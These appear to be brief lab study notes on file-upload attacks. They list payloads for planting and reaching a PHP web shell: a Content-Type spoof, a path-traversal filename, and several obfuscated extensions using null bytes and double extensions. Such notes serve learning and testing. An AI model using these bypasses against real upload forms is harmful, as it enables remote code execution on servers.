notes
-execute this command by GET /example/exploit.php?command=id HTTP/1.1
1. Remote code execution via web shell upload
GET /files/avatars/exploit.php
2. Content-Type restriction bypass
change
Content-Type: image/png
in POST request
3. Web shell upload via path traversal
change the file upload path (one directory above) by
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php
4. Web shell upload via obfuscated file extension
exploit.pHp
exploit.php.jpg
exploit%2ephp
exploit.php%00.jpg
exploit.asp;.jpg , exploit.asp%00.jpg
5. Web shell with polygoat
Last updated